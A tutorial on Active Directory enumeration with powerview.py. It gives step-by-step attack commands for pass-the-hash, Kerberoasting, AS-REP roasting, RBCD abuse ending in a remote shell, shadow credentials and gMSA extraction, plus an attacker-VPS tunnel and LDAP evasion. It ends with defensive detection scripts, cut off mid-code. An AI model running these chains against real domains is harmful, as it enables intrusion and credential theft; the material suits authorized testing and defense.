Linux PowerView.py: The Complete Guide to Active Directory Enumeration
In the world of offensive security, the ability to silently map a target environment, understand its internal structure, and identify its weaknesses is what separates a script kiddie from a seasoned penetration tester. When it comes to Windows enterprise environments, Active Directory (AD) is the crown jewel — the central nervous system that governs authentication, authorization, and access across the entire organization.
For this delicate task of domain reconnaissance, one tool has risen to near-legendary status: PowerView. Originally a PowerShell script authored by Will Schroeder (harmj0y) as part of the PowerSploit framework, PowerView has evolved into a powerful Python-based tool called powerview.py, making it an indispensable asset for hackers and security professionals operating on Linux. This comprehensive guide walks you through everything from initial setup to advanced attack chains, with hands-on examples at every step.
All techniques described in this article are for educational purposes and authorized penetration testing only. Unauthorized access to computer systems is illegal and punishable by law. Always obtain written permission before testing any system you do not own.
Why Active Directory Enumeration Matters
"Listen carefully to your enemy because they will tell you everything you need to know in order to defeat them." — OTW, Hackers-Arise
Active Directory was not designed with stealth in mind. It is a directory service, and its primary function is to provide information. Even with the lowest level of domain user privileges — a standard employee account — an attacker can uncover a remarkable wealth of information. This is by design: AD must be queryable to function. The consequence is that a patient, methodical attacker can map an entire enterprise network without ever triggering a traditional intrusion detection system.
Figure 1: Core Active Directory object types — Domains, Computers, OUs, Groups, Users, and Printers.
The information available through low-privilege LDAP queries includes user accounts and their attributes, computer objects and their roles, group memberships and permissions, Kerberos service principal names (SPNs), delegation configurations, trust relationships between domains, Group Policy Objects (GPOs), and Access Control Lists (ACLs). Understanding how to extract and interpret this data is the foundation of every successful Active Directory attack chain.
The Attacker's Mindset: Enumeration Before Exploitation
A mature hacker understands that noisy port scans and brute-force attacks are the tools of amateurs. The professional approach is to blend in with normal traffic, asking the same questions that legitimate administrative tools ask. The domain controller will answer honestly and completely, because from its perspective, you are just another authorized user querying the directory.
Figure 2: A structured Active Directory penetration testing methodology — from initial access through full domain compromise.
Understanding PowerView.py
PowerView.py is a Python 3 reimplementation of the original PowerView.ps1 PowerShell script, created by aniqfakhrul. It communicates with Active Directory using the LDAP and LDAPS protocols, as well as the Global Catalog (GC) and ADWS interfaces. The key advantage over the original PowerShell script is platform independence — it runs on any system with Python 3 installed, making it ideal for Linux-based attack platforms like Kali Linux and Parrot OS.
🔗 Multi-Protocol Support
Supports LDAP, LDAPS, Global Catalog, GC-SSL, and ADWS bindings with automatic fallback.
🔑 Flexible Authentication
Password, NTLM hash, Kerberos ticket, and PFX certificate authentication methods.
📋 Interactive Console
A persistent LDAP session with tab-completion, command history, and output formatting.
🔄 LDAP Obfuscation
Built-in query obfuscation to evade LDAP-based detection and monitoring systems.
🌐 Web Interface
Optional web UI for browsing AD objects from a browser — useful for collaborative assessments.
🔁 Relay Mode
Built-in NTLM relay capability to capture and relay authentication over HTTP/LDAP.
The original PowerView.ps1 is now detected by virtually every major antivirus and EDR solution, and it requires a Windows host with PowerShell. PowerView.py runs on Linux, so nothing is ever executed on a Windows host for endpoint AV to inspect, and it can be tunneled through proxychains for maximum stealth.
Installation & Environment Setup
Setting up powerview.py on a Kali Linux or Ubuntu-based attack machine is straightforward. The following steps cover the standard installation procedure as well as optional dependencies for Kerberos authentication.
Install Kerberos Development Libraries
Required for Kerberos ticket-based authentication. On Debian/Ubuntu systems:
```bash
$ sudo apt-get update
$ sudo apt-get install -y libkrb5-dev gcc python3-dev
```
Install pipx (Recommended)
pipx installs Python applications in isolated environments, preventing dependency conflicts.
```bash
$ sudo apt-get install -y pipx
$ pipx ensurepath
```
Install PowerView.py
Install directly from the GitHub repository for the latest version:
```bash
$ pipx install "git+https://github.com/aniqfakhrul/powerview.py"

# Or install from PyPI for a stable release:
$ pipx install powerview
```
Verify Installation
Confirm the tool is correctly installed and accessible from your PATH:
```text
$ powerview --help
usage: powerview [-h] [-v] [--use-ldap] [--use-ldaps] [--use-gc] [--use-gc-ldaps] [--use-adws]
                 [-k] [-H HASH] [--pfx PFX] [--no-pass] [--obfuscate] [--web] [--relay] ...
                 [target]

PowerView.py - Active Directory Enumeration Tool
```
Alternative Installation Methods
| Method | Command | Best For |
|---|---|---|
| pipx (recommended) | pipx install "git+https://github.com/aniqfakhrul/powerview.py" | Isolated environment, no conflicts |
| pip (global) | pip3 install powerview | Quick setup on dedicated VMs |
| Nix | nix run github:aniqfakhrul/powerview.py | NixOS / reproducible environments |
| Docker | docker run --rm -it aniqfakhrul/powerview.py | Containerized, portable deployments |
Authentication & Connection Methods
Connecting to a domain controller with powerview.py is highly flexible. The tool supports multiple authentication mechanisms, making it adaptable to a wide range of engagement scenarios — from standard password authentication to advanced certificate-based and hash-based techniques.
Method 1: Password Authentication
The simplest and most common method. Use a known username and password combination:
```bash
# Standard password authentication
$ powerview domain.local/jsmith:Password123!@192.168.1.10

# With LDAPS (encrypted)
$ powerview domain.local/jsmith:Password123!@192.168.1.10 --use-ldaps

# With Global Catalog (port 3268 - for multi-domain forests)
$ powerview domain.local/jsmith:Password123!@192.168.1.10 --use-gc
```
Method 2: Pass-the-Hash (NTLM)
When you have captured an NTLM hash (via Responder, Mimikatz, secretsdump, etc.) but do not know the plaintext password, you can authenticate directly with the hash:
```bash
# NTLM hash format: LM:NT (use 32 zeros for LM if unknown)
$ powerview domain.local/administrator@192.168.1.10 \
    -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

# NT hash only (modern systems)
$ powerview domain.local/administrator@192.168.1.10 \
    -H 8846f7eaee8fb117ad06bdd830b7586c
```
Method 3: Kerberos Ticket Authentication (Pass-the-Ticket)
If you have obtained a valid Kerberos TGT or TGS ticket (e.g., via ticket injection or Rubeus), you can use it directly:
```bash
# Export the ccache ticket path
$ export KRB5CCNAME=/tmp/administrator.ccache

# Connect using Kerberos (-k flag)
$ powerview domain.local/administrator@dc01.domain.local \
    -k --no-pass -ns 192.168.1.10
```
Method 4: Certificate-Based Authentication (PFX / Schannel)
Modern Active Directory environments increasingly use certificate-based authentication via Active Directory Certificate Services (ADCS). If you have obtained a PFX certificate (e.g., via ESC1 or shadow credentials), you can authenticate with it:
```bash
# PFX certificate (powerview will prompt for password if encrypted)
$ powerview 192.168.1.10 --pfx administrator.pfx

# With explicit certificate password
$ powerview 192.168.1.10 --pfx administrator.pfx --pfx-pass certpassword
```
Tunneling Through Proxychains
When your target domain controller is not directly reachable from your attack machine, you can tunnel powerview.py through a SOCKS proxy using proxychains. This is essential for internal network pivoting:
```bash
# Step 1: Create a reverse SSH SOCKS tunnel from the compromised host
compromised$ ssh -R 1080:localhost:1080 attacker@YOUR_VPS_IP -Nf

# Step 2: Configure /etc/proxychains4.conf on your attack machine
# Add: socks5 127.0.0.1 1080

# Step 3: Run powerview through proxychains
$ proxychains4 -q powerview domain.local/jsmith:Password123!@192.168.1.10
```
The Machine Account Quota (MAQ) Trick
What if you have a shell on a domain-joined machine but no valid user credentials? By default, every authenticated user in Active Directory can create up to 10 machine accounts. This is controlled by the ms-DS-MachineAccountQuota attribute on the domain object. You can exploit this to create a machine account and use its credentials for enumeration:
```bash
# Create a machine account using impacket-addcomputer
$ impacket-addcomputer domain.local/anyuser:anypassword \
    -computer-name ATTACKER01$ \
    -computer-pass AttackerPass123!

# Now use the machine account to connect with powerview
$ powerview domain.local/'ATTACKER01$':AttackerPass123!@192.168.1.10
```
Machine accounts created during testing should be cleaned up after the engagement. Orphaned machine accounts are a red flag for blue teams and may trigger incident response procedures. Use Remove-DomainComputer in powerview.py to remove them.
Core Enumeration Techniques
Once connected to the domain controller, you enter the interactive powerview.py console, indicated by the PV > prompt. From here, you can explore the entire Active Directory structure. Pressing Tab twice will display all available commands.
Figure 3: PowerView enumeration attack — querying users, groups, permissions, and domain admins from a single low-privilege account.
Domain & Forest Information
Start by gathering high-level information about the domain and forest. This establishes the scope of your engagement and reveals trust relationships:
```text
# Get basic domain information
PV > Get-Domain
name                      : DOMAIN
distinguishedName         : DC=domain,DC=local
domainFunctionality       : Windows2016Domain
forestFunctionality       : Windows2016Forest
ms-DS-MachineAccountQuota : 10

# Get all domain controllers
PV > Get-DomainController

# Get forest trust relationships
PV > Get-DomainTrust

# Check Machine Account Quota (important for MAQ abuse)
PV > Get-Domain -Properties ms-DS-MachineAccountQuota
```
Computer Enumeration
Computers are Active Directory objects with their own set of attributes, permissions, and potential misconfigurations. Enumerating computers is critical for identifying high-value targets, legacy systems, and delegation vulnerabilities:
```text
# List all enabled computers
PV > Get-DomainComputer -Enabled

# Count enabled computers
PV > Get-DomainComputer -Enabled -Count

# Export computer names to file for further processing
PV > Get-DomainComputer -Enabled -Properties name -OutFile /tmp/computers.txt

# Find computers with UNCONSTRAINED delegation (high-value targets!)
PV > Get-DomainComputer -Unconstrained

# Find computers with CONSTRAINED delegation
PV > Get-DomainComputer -TrustedToAuth

# Find computers running older, potentially vulnerable OS versions
PV > Get-DomainComputer -Properties name,operatingsystem | Where 'operatingsystem contains 2008'

# Get detailed info about a specific computer
PV > Get-NetComputerInfo -ComputerName DC01

# Display results in a formatted table
PV > Get-DomainComputer -Properties name,operatingsystem,dnshostname -TableView
```
After exporting computer names, use for i in $(cat /tmp/computers.txt); do ping -c1 -W1 "$i" >/dev/null 2>&1 && echo "$i is UP"; done to identify live hosts (ping's own output is discarded so only the UP lines are printed). Combine with nmap to fingerprint services on high-value targets.
User Enumeration
User enumeration is the heart of Active Directory reconnaissance. Understanding who has what privileges, which accounts have weak configurations, and which users are currently active is essential for planning your attack path:
```text
# List all domain users
PV > Get-DomainUser

# Get specific user details
PV > Get-DomainUser -Identity administrator

# Find users with Service Principal Names (Kerberoasting targets!)
PV > Get-DomainUser -SPN -Properties sAMAccountName,servicePrincipalName

# Find users with AdminCount=1 (protected/privileged accounts)
PV > Get-DomainUser -AdminCount -Properties sAMAccountName,memberOf

# Find users that do NOT require Kerberos pre-auth (AS-REP Roasting!)
PV > Get-DomainUser -PreAuthNotRequired -Properties sAMAccountName

# Find users with passwords that never expire
PV > Get-DomainUser -Where 'useraccountcontrol contains DONT_EXPIRE_PASSWORD'

# Find users with description fields (often contain passwords!)
PV > Get-DomainUser -Properties sAMAccountName,description -Where 'description ne ""'

# Find users who haven't changed passwords in 90+ days
PV > Get-DomainUser -Properties sAMAccountName,pwdLastSet -TableView

# Export all users to file
PV > Get-DomainUser -Properties sAMAccountName -OutFile /tmp/users.txt
```
A surprisingly common finding in real-world assessments is plaintext passwords stored in user description fields. Administrators sometimes set temporary passwords in descriptions during account provisioning and forget to remove them. Always check this field during enumeration.
Group Enumeration
Groups are the cornerstone of privilege management in Active Directory. Understanding group memberships reveals the power structure of the domain and identifies paths to privilege escalation:
```text
# List all domain groups
PV > Get-DomainGroup

# Get members of Domain Admins (the ultimate target)
PV > Get-DomainGroupMember -Identity "Domain Admins"

# Get members of Enterprise Admins
PV > Get-DomainGroupMember -Identity "Enterprise Admins"

# Get members of Backup Operators (can backup SAM/NTDS!)
PV > Get-DomainGroupMember -Identity "Backup Operators"

# Get members of Remote Desktop Users
PV > Get-DomainGroupMember -Identity "Remote Desktop Users"

# Recursively enumerate nested group memberships
PV > Get-DomainGroupMember -Identity "Domain Admins" -Recurse

# Find groups a specific user belongs to
PV > Get-DomainGroup -MemberIdentity jsmith

# Find foreign group members (cross-domain trust enumeration)
PV > Get-DomainForeignGroupMember
```
Organizational Unit (OU) Enumeration
OUs define the administrative structure of the domain and determine how Group Policy Objects are applied. Understanding the OU structure helps identify administrative boundaries and potential GPO-based attack paths:
```text
# List all Organizational Units
PV > Get-DomainOU

# Get OUs with their linked GPOs
PV > Get-DomainOU -Properties name,gplink

# Find computers in a specific OU
PV > Get-DomainComputer -SearchBase "OU=Servers,DC=domain,DC=local"
```
Session, Share & Service Enumeration
Active Login Session Enumeration
One of the most tactically valuable forms of enumeration is identifying where privileged users are currently logged in. If a Domain Admin is actively working on a workstation, that workstation becomes a high-priority target for credential harvesting:
```text
# List currently logged-on users via registry (requires admin rights)
PV > Get-RegLoggedOn -ComputerName WORKSTATION01

# Enumerate active network sessions on a server
PV > Get-NetSession -ComputerName FS01

# Find all machines where Domain Admins are logged in
PV > Get-NetLoggedOn -ComputerName DC01

# Enumerate terminal server sessions
PV > Get-NetTerminalSession -ComputerName RDSERVER01
```
Network Share Enumeration
Network shares are a treasure trove of sensitive information. Configuration files, scripts, backups, and even credential files are frequently found on accessible shares. Enumerating and accessing shares should be a priority in any internal assessment:
```text
# Enumerate shares on a specific computer
PV > Get-NetShare -ComputerName FS01

Name        Type      Remark
----        ----      ------
ADMIN$      DISKTREE  Remote Admin
C$          DISKTREE  Default share
IPC$        IPC       Remote IPC
Finance     DISKTREE  Finance Department Files
IT_Scripts  DISKTREE  IT Automation Scripts
Backups     DISKTREE  Server Backups

# After identifying shares, access them via SMB
$ smbclient //192.168.1.20/IT_Scripts -U 'domain.local/jsmith%Password123!'
```
Named Pipe Enumeration
Named pipes are inter-process communication channels in Windows. Certain named pipes, when accessible, can be abused for privilege escalation or lateral movement:
```text
# Enumerate accessible named pipes on a remote host
PV > Get-NamedPipes -ComputerName DC01
```
Exchange Server Enumeration
Microsoft Exchange servers are extremely high-value targets. They have historically been vulnerable to critical exploit chains (ProxyLogon, ProxyShell, ProxyNotShell) and, once compromised, provide access to email data, the ability to escalate to SYSTEM, and a pathway to domain compromise through Active Directory integration:
```text
# Find Exchange servers in the domain
PV > Get-ExchangeServer -Properties cn,serialNumber,msExchCurrentServerRoles

# Enumerate Exchange mailboxes
PV > Get-ExchangeMailbox

# Enumerate Exchange databases
PV > Get-ExchangeDatabase
```
ACL, Delegation & GPO Enumeration
Access Control List (ACL) Enumeration
ACLs define who can do what to which Active Directory objects. Misconfigured ACLs are one of the most common and impactful findings in AD assessments. A single overly permissive ACE (Access Control Entry) can provide a direct path to Domain Admin:
```text
# Get ACLs for a specific object
PV > Get-DomainObjectAcl -Identity administrator -ResolveGUIDs

# Find interesting ACLs (GenericAll, WriteDACL, WriteOwner, etc.)
PV > Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs

# Find ACLs where a specific user has interesting rights
PV > Get-DomainObjectAcl -Identity * -ResolveGUIDs | \
    Where 'SecurityIdentifier eq jsmith'

# Get the owner of a domain object
PV > Get-DomainObjectOwner -Identity "Domain Admins"
```
| ACE Right | What It Allows | Potential Attack |
|---|---|---|
| GenericAll | Full control over the object | Reset password, add to groups, modify attributes |
| GenericWrite | Write to any non-protected attribute | Set SPN for Kerberoasting, modify logon scripts |
| WriteOwner | Change the object's owner | Take ownership, then modify ACL |
| WriteDACL | Modify the object's ACL | Grant yourself GenericAll, then full control |
| ForceChangePassword | Reset user's password without knowing current | Takeover any user account |
| AllExtendedRights | All extended rights including password reset | Password reset, DCSync rights |
| DS-Replication-Get-Changes-All | Replicate directory changes (DCSync) | Dump all domain hashes via DCSync |
Delegation Enumeration
Kerberos delegation allows services to impersonate users when accessing other services. Misconfigured delegation is a critical vulnerability that can lead to full domain compromise:
```text
# Find computers with UNCONSTRAINED delegation
PV > Get-DomainComputer -Unconstrained -Properties name,dnshostname

# Find users with UNCONSTRAINED delegation
PV > Get-DomainUser -Unconstrained -Properties sAMAccountName

# Find computers with CONSTRAINED delegation (TrustedToAuth)
PV > Get-DomainComputer -TrustedToAuth -Properties name,msDS-AllowedToDelegateTo

# Find RBCD configurations
PV > Get-DomainRBCD
```
Figure 4: Unconstrained delegation attack — when a privileged user authenticates to a compromised server, their TGT is cached and can be extracted for impersonation.
Group Policy Object (GPO) Enumeration
GPOs control security settings across the domain. Misconfigured GPO permissions can allow an attacker to modify policies and push malicious configurations to all machines in an OU:
```text
# List all GPOs in the domain
PV > Get-DomainGPO

# Get GPO settings
PV > Get-DomainGPOSettings

# Find GPOs that add users to local admin groups
PV > Get-DomainGPOLocalGroup

# Find GPOs applied to a specific OU
PV > Get-DomainGPO -SearchBase "OU=Workstations,DC=domain,DC=local"
```
Advanced Attack Techniques
Kerberoasting
Kerberoasting is one of the most effective and stealthy attacks against Active Directory. Any domain user can request a Kerberos service ticket (TGS) for any service account with an SPN configured. The TGS is encrypted with the service account's password hash, which can then be cracked offline — no interaction with the target service required:
Figure 5: Kerberoasting attack flow — the attacker requests TGS tickets for SPN-configured accounts and cracks them offline.
```text
# Step 1: Identify Kerberoastable accounts with powerview
PV > Get-DomainUser -SPN -Properties sAMAccountName,servicePrincipalName,adminCount
sAMAccountName       : svc_sql
servicePrincipalName : MSSQLSvc/SQLSERVER01.domain.local:1433
adminCount           : 0

sAMAccountName       : svc_iis
servicePrincipalName : HTTP/webserver.domain.local
adminCount           : 0

# Step 2: Request TGS tickets using impacket-GetUserSPNs
$ impacket-GetUserSPNs domain.local/jsmith:Password123! \
    -dc-ip 192.168.1.10 -request -outputfile /tmp/kerberoast.txt

# Step 3: Crack the tickets offline with hashcat
$ hashcat -m 13100 /tmp/kerberoast.txt /usr/share/wordlists/rockyou.txt \
    --rules-file /usr/share/hashcat/rules/best64.rule

# Step 4: Crack with john the ripper (alternative)
$ john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/kerberoast.txt
```
AS-REP Roasting
AS-REP Roasting targets user accounts that have Kerberos pre-authentication disabled (DONT_REQ_PREAUTH). For these accounts, an attacker can request an AS-REP message without knowing the user's password, and the response contains data encrypted with the user's password hash:
```text
# Step 1: Find accounts without pre-auth requirement
PV > Get-DomainUser -PreAuthNotRequired -Properties sAMAccountName

# Step 2: Request AS-REP hashes
$ impacket-GetNPUsers domain.local/ -usersfile /tmp/users.txt \
    -dc-ip 192.168.1.10 -format hashcat -outputfile /tmp/asrep.txt

# Step 3: Crack offline
$ hashcat -m 18200 /tmp/asrep.txt /usr/share/wordlists/rockyou.txt
```
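Both the -PreAuthNotRequired switch used here and the useraccountcontrol contains DONT_EXPIRE_PASSWORD filter in the user-enumeration section come down to single bits in the userAccountControl attribute. The following audit script is added for this article and is not part of powerview.py: it decodes those bits, shows the LDAP bit-AND filter such queries compile to, and reports the flags the hardening table below treats as findings. The sample records and the severity mapping are constructed for the example.

```python
"""Audit userAccountControl (UAC) bit flags for the settings this guide hunts
with -PreAuthNotRequired, -Unconstrained / -TrustedToAuth and the
DONT_EXPIRE_PASSWORD filter. Example added for this article; the sample
records below are constructed and the severity mapping is the example's own."""

# Bit values as documented by Microsoft for the userAccountControl attribute.
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "PASSWD_NOTREQD": 0x0020,
    "NORMAL_ACCOUNT": 0x0200,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,            # unconstrained delegation
    "NOT_DELEGATED": 0x100000,                    # "Account is sensitive and cannot be delegated"
    "DONT_REQ_PREAUTH": 0x400000,                 # AS-REP roastable
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,  # constrained delegation with protocol transition
}

# Flags that count as findings, with a severity that follows the hardening table.
RISKY_FLAGS = {
    "DONT_REQ_PREAUTH": "Critical",
    "TRUSTED_FOR_DELEGATION": "Critical",
    "TRUSTED_TO_AUTH_FOR_DELEGATION": "High",
    "PASSWD_NOTREQD": "High",
    "DONT_EXPIRE_PASSWORD": "Medium",
}

# LDAP_MATCHING_RULE_BIT_AND: the extensible-match OID that lets an LDAP filter
# test individual bits. "Find users without pre-auth" is expressed this way on the wire.
LDAP_BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(value):
    """Return the set of flag names that are set in a userAccountControl integer."""
    return {name for name, bit in UAC_FLAGS.items() if value & bit}


def uac_filter(flag, negate=False):
    """Build the LDAP filter that matches objects with (or, negated, without) one UAC bit."""
    clause = f"(userAccountControl:{LDAP_BIT_AND}:={UAC_FLAGS[flag]})"
    return f"(!{clause})" if negate else clause


def audit_accounts(records):
    """Report every risky UAC bit on every account. Disabled accounts are still
    listed, because their flags survive re-enablement, but marked enabled=False."""
    findings = []
    for rec in records:
        flags = decode_uac(rec["userAccountControl"])
        enabled = "ACCOUNTDISABLE" not in flags
        for flag, severity in RISKY_FLAGS.items():
            if flag in flags:
                findings.append({
                    "sAMAccountName": rec["sAMAccountName"],
                    "flag": flag,
                    "severity": severity,
                    "enabled": enabled,
                })
    # Most severe first, then by account name, so the report order is stable.
    order = {"Critical": 0, "High": 1, "Medium": 2}
    findings.sort(key=lambda f: (order[f["severity"]], f["sAMAccountName"]))
    return findings


# Constructed sample: the two attributes the audit needs, as an export of
# Get-DomainUser -Properties sAMAccountName,userAccountControl might provide them.
SAMPLE_USERS = [
    {"sAMAccountName": "jsmith",     "userAccountControl": 0x200},                    # plain user
    {"sAMAccountName": "svc_legacy", "userAccountControl": 0x200 | 0x400000},         # no pre-auth
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x200 | 0x10000},          # password never expires
    {"sAMAccountName": "old_admin",  "userAccountControl": 0x200 | 0x2 | 0x80000},    # disabled, unconstrained
]

if __name__ == "__main__":
    for f in audit_accounts(SAMPLE_USERS):
        state = "" if f["enabled"] else " (disabled)"
        print(f'{f["severity"]:8} {f["sAMAccountName"]:12} {f["flag"]}{state}')
    print(uac_filter("DONT_REQ_PREAUTH"))
```

The generated filter is the same one PowerView issues for -PreAuthNotRequired, so it can be pasted into any LDAP client to cross-check the tool's output against your own audit.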
Resource-Based Constrained Delegation (RBCD) Abuse
RBCD is a powerful privilege escalation technique. If an attacker can write to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of a computer object, they can configure it to allow a machine account they control to impersonate any user on that computer — including Domain Admins:
Figure 6: Active Directory attack path visualization — chaining misconfigurations from initial access to Domain Admin.
```text
# Step 1: Check Machine Account Quota
PV > Get-Domain -Properties ms-DS-MachineAccountQuota

# Step 2: Create a controlled machine account
PV > Add-DomainComputer -ComputerName ATTACKER01 -ComputerPass AttackerPass123!
[+] Successfully added machine account ATTACKER01$ with password AttackerPass123!

# Step 3: Configure RBCD on the target computer
PV > Add-DomainObjectAcl -TargetIdentity SQLSERVER01 \
    -PrincipalIdentity ATTACKER01 -Rights RBCD
[+] ATTACKER01$ can now impersonate users on SQLSERVER01$ via S4U2Proxy

# Step 4: Verify the RBCD configuration
PV > Get-DomainComputer SQLSERVER01 -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

# Step 5: Request a service ticket impersonating Administrator
$ impacket-getST domain.local/'ATTACKER01$':AttackerPass123! \
    -spn CIFS/SQLSERVER01.domain.local \
    -impersonate Administrator \
    -dc-ip 192.168.1.10

# Step 6: Use the ticket to get a shell
$ KRB5CCNAME=Administrator.ccache impacket-psexec \
    Administrator@SQLSERVER01.domain.local -k -no-pass
```
Shadow Credentials Attack
Shadow Credentials is a modern attack technique that abuses the msDS-KeyCredentialLink attribute. If an attacker has GenericWrite or WriteProperty rights over a user or computer object, they can add a shadow credential (a certificate key pair) to that object and then use it to obtain a TGT:
```text
# Add shadow credentials to a target user
PV > Set-ShadowCredential -TargetIdentity jdoe -OutFile /tmp/jdoe.pfx
[+] Shadow credentials added to jdoe
[+] Certificate saved to /tmp/jdoe.pfx

# Authenticate using the certificate to get a TGT
$ impacket-gettgtpkinit domain.local/jdoe -cert-pfx /tmp/jdoe.pfx /tmp/jdoe.ccache

# View existing shadow credentials
PV > Get-ShadowCred -Identity jdoe
```
gMSA Password Extraction
Group Managed Service Accounts (gMSAs) are a more secure alternative to traditional service accounts, with automatically managed passwords. However, if an attacker has the appropriate permissions, they can read the gMSA password blob and use it for authentication:
```text
# Find all gMSA accounts and check read permissions
PV > Get-DomainGMSA
ObjectDnsHostname       : dc01.domain.local
ObjectSAN               : gMSA01$
ObjectSID               : S-1-5-21-...-3654
PrincipallAllowedToRead : DOMAIN\svc_backup
GMSAPassword            : 54908ce8beb44115cfb5b6a265af33f0   <-- readable!

# Enumerate gMSA via computer objects
PV > Get-DomainComputer -GMSAPassword
```
BloodHound Integration & Attack Path Analysis
While powerview.py excels at targeted enumeration, BloodHound is the industry-standard tool for visualizing complex Active Directory relationships and automatically identifying attack paths. The two tools complement each other perfectly.
Figure 7: BloodHound graph visualization showing attack paths from a compromised user to Domain Admin through nested group memberships and ACL relationships.
```bash
# Collect BloodHound data using bloodhound-python (Linux)
$ pip3 install bloodhound
$ bloodhound-python -u jsmith -p Password123! \
    -d domain.local -ns 192.168.1.10 \
    -c All --zip

# Or use SharpHound on a Windows host (if available)
# SharpHound.exe -c All --outputdirectory C:\temp

# Start BloodHound and import the zip file
$ neo4j start
$ bloodhound &
```
BloodHound includes powerful pre-built Cypher queries: "Find Shortest Paths to Domain Admins", "Find Principals with DCSync Rights", "Find Computers where Domain Users are Local Admin", "Find Kerberoastable Users with Path to High Value Targets", and many more. These queries can instantly reveal critical attack paths that would take hours to find manually.
LDAP Obfuscation & Detection Evasion
Modern Security Operations Centers (SOCs) monitor LDAP traffic for suspicious enumeration patterns. powerview.py includes a built-in obfuscation engine that transforms LDAP queries to vary their observable patterns while preserving their functional intent:
```bash
# Enable obfuscation at connection time
$ powerview domain.local/jsmith:Password123!@192.168.1.10 --obfuscate

# Obfuscation techniques applied automatically:
# - OID attribute encoding with spacing/zero-variation
# - Random casing of attributes and values
# - Numeric/SID zero-prepend on values
# - Hex-encoding of eligible values
# - Context-aware spacing in filters and DNs
# - Equality to approximation operator substitution
# - Wildcard expansion
# - DN hex escaping with random casing
```
| Evasion Technique | Description | Effectiveness |
|---|---|---|
| LDAP Obfuscation | Randomizes LDAP query structure while preserving results | High against signature-based detection |
| LDAPS (Encrypted) | Encrypts LDAP traffic, preventing plaintext inspection | High against network-level monitoring |
| Proxychains Tunneling | Routes traffic through legitimate-looking proxies | High for network-level detection |
| Slow Enumeration | Rate-limiting queries to avoid velocity-based alerts | Medium against behavioral analytics |
| Kerberos Auth | Uses Kerberos instead of NTLM to avoid NTLM-based alerts | Medium against authentication monitoring |
Blue Team: Detection & Defense Strategies
Understanding how attackers enumerate your environment is the first step to defending it. The following recommendations are based on real-world incident response findings and industry best practices:
Detection Strategies
Windows Event Log IDs to monitor:

- Event ID 4662 - An operation was performed on an object (LDAP reads)
- Event ID 4768 - Kerberos TGT request (AS-REQ)
- Event ID 4769 - Kerberos TGS request (TGS-REQ) - Kerberoasting
- Event ID 4771 - Kerberos pre-auth failure
- Event ID 4776 - NTLM authentication attempt
- Event ID 5136 - Directory service object modified (RBCD, Shadow Creds)
- Event ID 4741 - Computer account created (MAQ abuse)

Splunk query for Kerberoasting detection:

```text
index=security EventCode=4769 TicketEncryptionType=0x17
| stats count by Account_Name, Client_Address
| where count > 5
```
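The same threshold logic as the Splunk query, plus the AS-REP roasting indicator that 4768 carries, run over a handful of Security events. This detection script is added for this article and is not part of powerview.py or any SIEM product; the events, the client addresses and the noise filter for machine accounts and krbtgt are constructed assumptions for the example.

```python
"""Detection pass over Windows Security events for the two Kerberos attacks this
guide describes: the Kerberoasting threshold of the Splunk query (4769, RC4,
count per account and client) and an AS-REP roasting indicator (4768 with
Pre-Authentication Type 0). Added for this article; all events are constructed."""
from collections import defaultdict

RC4_HMAC = "0x17"         # Ticket Encryption Type for RC4-HMAC, the cipher crackers prefer
AES256_SHA1 = "0x12"      # AES256, the expected encryption on a hardened domain
KERBEROAST_THRESHOLD = 5  # the same "count > 5" as the Splunk query


def _tgs(account, service, enc, client="::ffff:192.168.1.50"):
    """Constructed 4769 record with the field names the Splunk query uses."""
    return {"EventCode": 4769, "Account_Name": account, "Service_Name": service,
            "Ticket_Encryption_Type": enc, "Client_Address": client}


def _as_req(account, preauth_type, enc, client="::ffff:192.168.1.50"):
    """Constructed 4768 record. Pre_Authentication_Type 0 = logon without pre-auth."""
    return {"EventCode": 4768, "Account_Name": account, "Pre_Authentication_Type": preauth_type,
            "Ticket_Encryption_Type": enc, "Client_Address": client}


# Constructed sample telemetry: one user pulling RC4 service tickets for six
# different SPN accounts in quick succession, plus benign background noise.
SAMPLE_EVENTS = [
    _tgs("jsmith@DOMAIN.LOCAL", "svc_sql", RC4_HMAC),
    _tgs("jsmith@DOMAIN.LOCAL", "svc_iis", RC4_HMAC),
    _tgs("jsmith@DOMAIN.LOCAL", "svc_backup", RC4_HMAC),
    _tgs("jsmith@DOMAIN.LOCAL", "svc_sccm", RC4_HMAC),
    _tgs("jsmith@DOMAIN.LOCAL", "svc_exchange", RC4_HMAC),
    _tgs("jsmith@DOMAIN.LOCAL", "svc_print", RC4_HMAC),
    _tgs("jdoe@DOMAIN.LOCAL", "FS01$", AES256_SHA1, client="::ffff:192.168.1.77"),   # normal file-server access
    _tgs("jdoe@DOMAIN.LOCAL", "krbtgt", AES256_SHA1, client="::ffff:192.168.1.77"),  # TGT renewal
    _as_req("svc_legacy", "0", RC4_HMAC),      # no pre-auth: the AS-REP is crackable offline
    _as_req("jsmith", "2", AES256_SHA1),       # PA-ENC-TIMESTAMP, the normal case
]


def is_noise_service(service_name):
    """Machine accounts and krbtgt have long, automatically rotated secrets; tickets
    for them are not realistic cracking targets and only add false positives."""
    return service_name.endswith("$") or service_name.lower() == "krbtgt"


def detect_kerberoasting(events, threshold=KERBEROAST_THRESHOLD):
    """Alert when one (account, client) pair requests more than `threshold` RC4
    service tickets. The distinct service names are kept for the analyst."""
    counts = defaultdict(int)
    services = defaultdict(set)
    for e in events:
        if e["EventCode"] != 4769 or e["Ticket_Encryption_Type"] != RC4_HMAC:
            continue
        if is_noise_service(e["Service_Name"]):
            continue
        key = (e["Account_Name"], e["Client_Address"])
        counts[key] += 1
        services[key].add(e["Service_Name"])
    return [
        {"rule": "kerberoasting", "account": account, "client": client,
         "count": n, "services": sorted(services[(account, client)])}
        for (account, client), n in counts.items() if n > threshold
    ]


def detect_asrep_roasting(events):
    """A 4768 with Pre-Authentication Type 0 means the KDC issued an AS-REP without a
    pre-auth timestamp, i.e. the account has DONT_REQ_PREAUTH set."""
    return [
        {"rule": "asrep_roasting", "account": e["Account_Name"],
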